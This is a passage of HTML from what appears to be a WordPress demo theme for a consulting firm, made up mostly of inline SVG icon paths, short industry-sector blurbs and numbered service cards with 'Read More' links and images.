		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>					
			        				            <h6>Government Services</h6>			            <p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>					
			        				            <h6>Consumer Products</h6>			            <p>Our work draws on more than 40 years of experience, delivered by 5,700 professionals in the world.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>					
			        				            <h6>Airlines & Transport</h6>			            <p>Few industries are as demanding as transportation services. That's why it is critical to implement high-impact.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -9 512.00092 512"><path d="m243.273438 147.371094c-4.140626 0-7.5 3.359375-7.5 7.5v74.769531c0 4.144531 3.359374 7.5 7.5 7.5 4.144531 0 7.5-3.355469 7.5-7.5v-74.769531c0-4.140625-3.359376-7.5-7.5-7.5zm0 0"></path><path d="m152.441406 383.160156 64.75-37.386718c3.589844-2.070313 4.816406-6.65625 2.746094-10.242188s-6.660156-4.816406-10.242188-2.746094l-64.753906 37.386719c-3.585937 2.070313-4.816406 6.65625-2.746094 10.242187 2.082032 3.605469 6.675782 4.808594 10.246094 2.746094zm0 0"></path><path d="m383.484375 349.453125-64.753906-37.386719c-3.589844-2.070312-8.175781-.839844-10.246094 2.746094s-.839844 8.171875 2.746094 10.242188l64.753906 37.386718c1.179687.679688 2.46875 1.003906 3.742187 1.003906 2.589844 0 5.113282-1.34375 6.5-3.75 2.070313-3.585937.84375-8.171874-2.742187-10.242187zm0 0"></path><path d="m63.074219 331.53125c.371093 0 .75-.027344 1.128906-.085938 4.097656-.617187 6.914063-4.4375 6.292969-8.535156-1.378906-9.132812-2.078125-18.472656-2.078125-27.757812 0-71.730469 41.214843-135.011719 103.09375-165.410156 3.71875-1.828126 5.253906-6.320313 3.425781-10.039063-1.824219-3.714844-6.316406-5.25-10.035156-3.425781-67.039063 32.929687-111.484375 101.449218-111.484375 178.875 0 10.035156.757812 20.125 2.25 30 .558593 3.714844 3.757812 6.378906 7.40625 6.378906zm0 0"></path><path d="m170.335938 166.796875c-43.941407 28.21875-70.171876 76.203125-70.171876 128.355469 0 3.332031.117188 6.808594.355469 10.34375.273438 4.101562 3.8125 7.257812 7.980469 6.984375 4.132812-.277344 7.261719-3.855469 6.984375-7.984375-.214844-3.203125-.324219-6.347656-.324219-9.34375 0-47.023438 23.65625-90.289063 63.28125-115.738282 3.484375-2.238281 4.496094-6.875 2.257813-10.359374-2.238281-3.488282-6.878907-4.496094-10.363281-2.257813zm0 0"></path><path d="m320.199219 123.789062c8.589843 3.398438 17.015625 7.492188 25.039062 12.160157 62.003907 36.074219 95.972657 103.523437 91.128907 172.296875-.292969 4.128906 2.820312 7.714844 6.953124 8.007812.179688.011719.355469.015625.535157.015625 3.898437 0 7.195312-3.019531 7.472656-6.972656 5.25-74.5-31.621094-147.375-98.546875-186.3125-8.671875-5.042969-17.773438-9.464844-27.0625-13.144531-3.851562-1.523438-8.210938.363281-9.734375 4.214844-1.523437 3.851562.363281 8.207031 4.214844 9.734374zm0 0"></path><path d="m313.492188 171.933594c2.867187 1.421875 5.640624 2.90625 8.234374 4.417968 40.648438 23.648438 66.148438 65.855469 68.21875 112.902344.175782 4.023438 3.496094 7.167969 7.484376 7.167969.113281 0 .226562 0 .335937-.007813 4.140625-.179687 7.34375-3.683593 7.164063-7.820312-2.296876-52.171875-30.578126-98.976562-75.660157-125.207031-2.882812-1.675781-5.953125-3.324219-9.117187-4.890625-3.710938-1.839844-8.210938-.320313-10.050782 3.386718-1.839843 3.710938-.320312 8.210938 3.390626 10.050782zm0 0"></path><path d="m371.164062 436.148438c-7.078124 5.9375-14.6875 11.398437-22.609374 16.234374-61.472657 37.511719-136.953126 35-194.902344-1.839843-3.492188-2.222657-8.132813-1.191407-10.351563 2.304687-2.222656 3.496094-1.191406 8.128906 2.304688 10.351563 63.878906 40.613281 145.515625 41.800781 210.761719 1.984375 8.5625-5.222656 16.78125-11.125 24.4375-17.542969 3.171874-2.664063 3.585937-7.390625.925781-10.566406-2.660157-3.171875-7.390625-3.589844-10.566407-.925781zm0 0"></path><path d="m332.015625 425.285156c2.855469-1.738281 5.761719-3.65625 8.648437-5.695312 3.382813-2.386719 4.1875-7.066406 1.796876-10.449219-2.390626-3.382813-7.066407-4.1875-10.453126-1.800781-2.609374 1.847656-5.234374 3.574218-7.804687 5.140625-40.136719 24.5-89.390625 26.84375-131.757813 6.273437-3.726562-1.808594-8.214843-.253906-10.023437 3.472656-1.808594 3.722657-.253906 8.210938 3.472656 10.019532 46.933594 22.789062 101.5625 20.230468 146.121094-6.960938zm0 0"></path><path d="m506.246094 418.738281-153.742188-142.207031c-1.605468-1.488281-3.773437-2.199219-5.953125-1.945312l-45.195312 5.210937c-1.582031-5-3.917969-9.667969-6.863281-13.875l-6.4375-176.585937c-.148438-4.136719-3.628907-7.382813-7.765626-7.21875-4.140624.148437-7.371093 3.628906-7.222656 7.765624l5.882813 161.445313c-15.636719-9.433594-35.507813-9.710937-51.355469-.75l-24.09375-32.464844 45.523438-200.886719c.296874-1.3125 1.445312-2.226562 2.789062-2.226562h15.765625c1.546875 0 2.800781 1.210938 2.859375 2.753906l1.707031 46.886719c.152344 4.140625 3.652344 7.359375 7.769531 7.21875 4.136719-.148437 7.371094-3.625 7.222657-7.765625l-1.710938-46.886719c-.351562-9.648437-8.191406-17.207031-17.847656-17.207031h-15.765625c-8.398438 0-15.5625 5.722656-17.414062 13.910156l-46.285157 204.25c-.484375 2.132813-.011719 4.371094 1.289063 6.125l26.355468 35.511719c-7.160156 7.457031-12.089843 17.070313-13.6875 27.757813l-193.675781 121.4375c-8.183593 5.128906-10.808593 15.699218-5.980469 24.058593l7.882813 13.65625c3.273437 5.664063 9.167969 8.941407 15.40625 8.941407 1.773437 0 3.574219-.265626 5.351563-.816407l45.554687-14.128906c3.957031-1.226563 6.171875-5.429687 4.941406-9.382813-1.226562-3.957031-5.425781-6.167968-9.382812-4.941406l-45.558594 14.128906c-1.28125.398438-2.652344-.136718-3.324219-1.300781l-7.882812-13.65625c-.773438-1.335937-.351563-3.027343.957031-3.851562l186.105469-116.6875c3.703125 18.878906 17.835937 34.054687 36.125 39.28125l-15.246094 35.195312-123.925781 38.4375c-3.957031 1.226563-6.167969 5.425781-4.941407 9.382813 1.226563 3.957031 5.429688 6.167968 9.386719 4.941406l127.21875-39.457031c2.085938-.648438 3.789063-2.175781 4.660157-4.183594l18.359374-42.386719c1.921876-.054687 3.816407-.214844 5.679688-.476562l218.09375 115.535156c2.683594 1.421875 5.558594 2.101562 8.390625 2.101562 6.167969 0 12.125-3.21875 15.433594-8.949218l7.886719-13.65625c4.195312-7.273438 2.824218-16.335938-3.339844-22.039063zm-253.636719-87.476562c-20.011719 0-36.109375-16.453125-36.109375-36.109375 0-19.941406 16.238281-36.105469 36.109375-36.105469 19.875 0 36.105469 16.195313 36.105469 36.105469 0 19.675781-15.972656 36.109375-36.105469 36.109375zm243.984375 102.015625-7.882812 13.65625c-.769532 1.335937-2.441407 1.820312-3.8125 1.09375l-205.929688-109.089844c15.308594-9.246094 24.945312-26.113281 24.742188-44.3125l41.136718-4.746094 151.214844 139.871094c.984375.914062 1.207031 2.363281.53125 3.527344zm0 0"></path></svg>					
			        				            <h6>Natural Resources</h6>			            <p>We provide deep experience across the oil & gas and utilities & renewables sectors to deliver operational.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 511.989 511.989" style="enable-background:new 0 0 511.989 511.989;" xml:space="preserve">
<g>
	<path d="M504.89,145.383L320.201,38.759c-3.291-1.906-7.127-2.413-10.798-1.43c-3.673,0.985-6.74,3.344-8.627,6.628l-12.728,22.041   c-1.799-0.322-3.647-0.5-5.537-0.5H156.94c-4.142,0-7.5,3.357-7.5,7.5s3.358,7.5,7.5,7.5h125.57c9.021,0,16.36,7.334,16.36,16.35   v346.95c0,9.016-7.339,16.351-16.36,16.351H61.05c-9.021,0-16.36-7.335-16.36-16.351v-45.304h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.921-4.817-10.738-10.739-10.738H10.739C4.817,357.583,0,362.4,0,368.321v19.435   c0,5.922,4.817,10.739,10.739,10.739H29.69v45.304c0,17.287,14.068,31.351,31.36,31.351h221.46c17.292,0,31.36-14.063,31.36-31.351   V307.929l47.71,27.545c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245   l-55.21-31.875v-23.21l65.26,37.675c1.182,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   c2.071-3.588,0.842-8.175-2.745-10.245l-72.76-42.005V226.87l82.81,47.814c1.182,0.682,2.471,1.006,3.744,1.006   c2.591,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-90.311-52.146v-23.209l100.36,57.945   c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-107.86-62.275   v-72.17c0-10.015-4.727-18.94-12.062-24.684l11.565-20.026l183.342,105.846L337.944,432.978c-3.462-1.548-7.608-0.26-9.548,3.099   c-2.072,3.586-0.845,8.174,2.742,10.246c2.23,1.289,4.669,1.901,7.08,1.901c4.915-0.001,9.707-2.549,12.347-7.105l159.538-276.324   C513.999,158.015,511.665,149.31,504.89,145.383z M15,372.583h44.383v10.912H15V372.583z"></path>
	<path d="M430.955,155.172l-82.268-47.497c-3.588-2.071-8.174-0.843-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l82.268,47.497c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   C435.771,161.83,434.542,157.243,430.955,155.172z"></path>
	<path d="M10.739,153.406H29.69v55.593c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-55.593h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.922-4.817-10.739-10.739-10.739H44.69V96.848c0-9.016,7.339-16.35,16.36-16.35   h65.9c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5h-65.9c-17.292,0-31.36,14.063-31.36,31.35v15.645H10.739   C4.817,112.493,0,117.31,0,123.232v19.435C0,148.589,4.817,153.406,10.739,153.406z M15,127.493h44.383v10.913H15V127.493z"></path>
	<path d="M10.739,275.95h18.952v59.254c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5V275.95h18.953   c5.921,0,10.739-4.817,10.739-10.738v-19.435c0-5.922-4.817-10.739-10.739-10.739H10.739C4.817,235.038,0,239.855,0,245.777v19.435   C0,271.133,4.817,275.95,10.739,275.95z M15,250.038h44.383v10.912H15V250.038z"></path>
	<path d="M103.629,147.61v38.978c0,7.112,5.786,12.898,12.898,12.898h110.504c7.112,0,12.898-5.786,12.898-12.898V147.61   c0-7.112-5.786-12.898-12.898-12.898H116.527C109.415,134.712,103.629,140.498,103.629,147.61z M118.629,149.712H224.93v34.774   H118.629V149.712z"></path>
</g>
</svg>					
			        				            <h6>Private Equity</h6>			            <p>Firm is the leading consulting partner to the private equity industry and its key stakeholders. We advise investors.</p>			        
								01
								<h4>Client Learning<br>  Programs</h4>
								<p>Accelerate your innovation and transformation with a fully integrated suite of capabilities that puts digital at the heart of everything you do.</p>							
								<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
									Read More
								</a>
					<figure>
						<img width="1920" height="745" src="https://maxbizz.s3.amazonaws.com/images/fservice1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/fservice1.jpg 1920w, https://maxbizz.s3.amazonaws.com/images/fservice1-300x116.jpg 300w, https://maxbizz.s3.amazonaws.com/images/fservice1-1024x397.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/fservice1-768x298.jpg 768w, https://maxbizz.s3.amazonaws.com/images/fservice1-1536x596.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" />					</figure>
								02
								<h4>Partnership <br>  Ecosystem</h4>
								<p>Accelerate your innovation and transformation with a fully integrated suite of capabilities that puts digital at the heart of everything you do.</p>							
								<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
									Read More
								</a>
					<figure>
						<img width="1920" height="745" src="https://maxbizz.s3.amazonaws.com/images/fservice2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/fservice2.jpg 1920w, https://maxbizz.s3.amazonaws.com/images/fservice2-300x116.jpg 300w, https://maxbizz.s3.amazonaws.com/images/fservice2-1024x397.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/fservice2-768x298.jpg 768w, https://maxbizz.s3.amazonaws.com/images/fservice2-1536x596.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" />					</figure>
								03
								<h4>New Business  <br>  Innovation</h4>
								<p>Accelerate your innovation and transformation with a fully integrated suite of capabilities that puts digital at the heart of everything you do.</p>							
								<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
									Read More
								</a>
					<figure>
